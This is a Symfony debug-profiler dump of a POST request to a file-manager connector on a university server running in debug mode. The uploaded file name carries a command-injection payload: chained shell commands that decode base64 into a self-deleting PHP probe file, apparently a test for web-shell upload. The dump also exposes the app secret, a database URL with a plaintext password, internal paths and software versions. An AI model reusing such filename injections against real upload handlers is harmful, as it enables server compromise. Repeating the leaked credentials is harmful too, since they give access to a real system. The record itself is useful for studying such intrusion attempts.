ErrorController
Request
GET Parameters
No GET parameters
POST Parameters
| Key | Value |
|---|---|
| cmd | "upload" |
| target | "l1_Lw" |
Uploaded Files
| Key | Value |
|---|---|
| upload | [ Symfony\Component\HttpFoundation\File\UploadedFile {#17 -test: false -originalName: "kawobt.jpeg;echo PD9waHAgZWNobyBtZDUoJ3lscXNzcicpO3VubGluayhfX0ZJTEVfXyk7Pz4= | base64 -d > ylqssr.php;echo kawobt.jpeg" -mimeType: "image/jpeg" -error: 0 : "/tmp" : "phpkVYU21" : "phpkVYU21" : "/tmp/phpkVYU21" : "" : "/tmp/phpkVYU21" : 2026-03-15 04:00:46 : 2026-03-15 04:00:46 : 2026-03-15 04:00:46 : 672697407 : 284 : 0100600 : 48 : 48 : "file" : true : true : false : true : false : false } ] |
Request Attributes
Request Headers
| Header | Value |
|---|---|
| accept-encoding | "gzip" |
| connection | "close" |
| content-length | "771" |
| content-type | "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW" |
| host | "rad-sdsc.ucsd.edu" |
| user-agent | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15" |
| x-php-ob-level | "1" |
Request Content
Request content not available (it was retrieved as a resource).
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=UTF-8" |
| date | "Sun, 15 Mar 2026 04:00:46 GMT" |
| x-debug-exception | "No%20route%20found%20for%20%22POST%20https%3A%2F%2Frad-sdsc.ucsd.edu%2Fphp%2Fconnector.minimal.php%22" |
| x-debug-exception-file | "%2Fvar%2Fwww%2Fwebapps%2FFellowshipApplication%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135" |
| x-debug-token | "dd0bfc" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_ENV | "dev" |
| APP_SECRET | "0da11a0b64b06231a4c8bc059d84af49" |
| DATABASE_URL | "postgresql://radfluro:myradpw0!@127.0.0.1:5432/fellowapp28?serverVersion=13&charset=utf8" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "771" |
| CONTENT_TYPE | "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW" |
| CONTEXT_DOCUMENT_ROOT | "/var/www/webapps/FellowshipApplication/public" |
| CONTEXT_PREFIX | "" |
| DOCUMENT_ROOT | "/var/www/webapps/FellowshipApplication/public" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HTTPS | "on" |
| HTTP_ACCEPT_ENCODING | "gzip" |
| HTTP_CONNECTION | "close" |
| HTTP_HOST | "rad-sdsc.ucsd.edu" |
| HTTP_USER_AGENT | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15" |
| PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "" |
| REMOTE_ADDR | "64.52.80.240" |
| REMOTE_PORT | "46398" |
| REQUEST_METHOD | "GET" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1773547246 |
| REQUEST_TIME_FLOAT | 1773547246.2957 |
| REQUEST_URI | "/php/connector.minimal.php" |
| SCRIPT_FILENAME | "/var/www/webapps/FellowshipApplication/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "132.249.119.111" |
| SERVER_ADMIN | "eghobrial@ucsd.edu" |
| SERVER_NAME | "rad-sdsc.ucsd.edu" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SIGNATURE | "" |
| SERVER_SOFTWARE | "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33" |
| SSL_TLS_SNI | "rad-sdsc.ucsd.edu" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL" |
| UNIQUE_ID | "abYu7sealsE4lnTaOAWjIAAAAAU" |
Parent Request
Return to parent request (token = d62bb1)
| Key | Value |
|---|---|
| _remove_csp_headers | true |
| _stopwatch_token | "13044d" |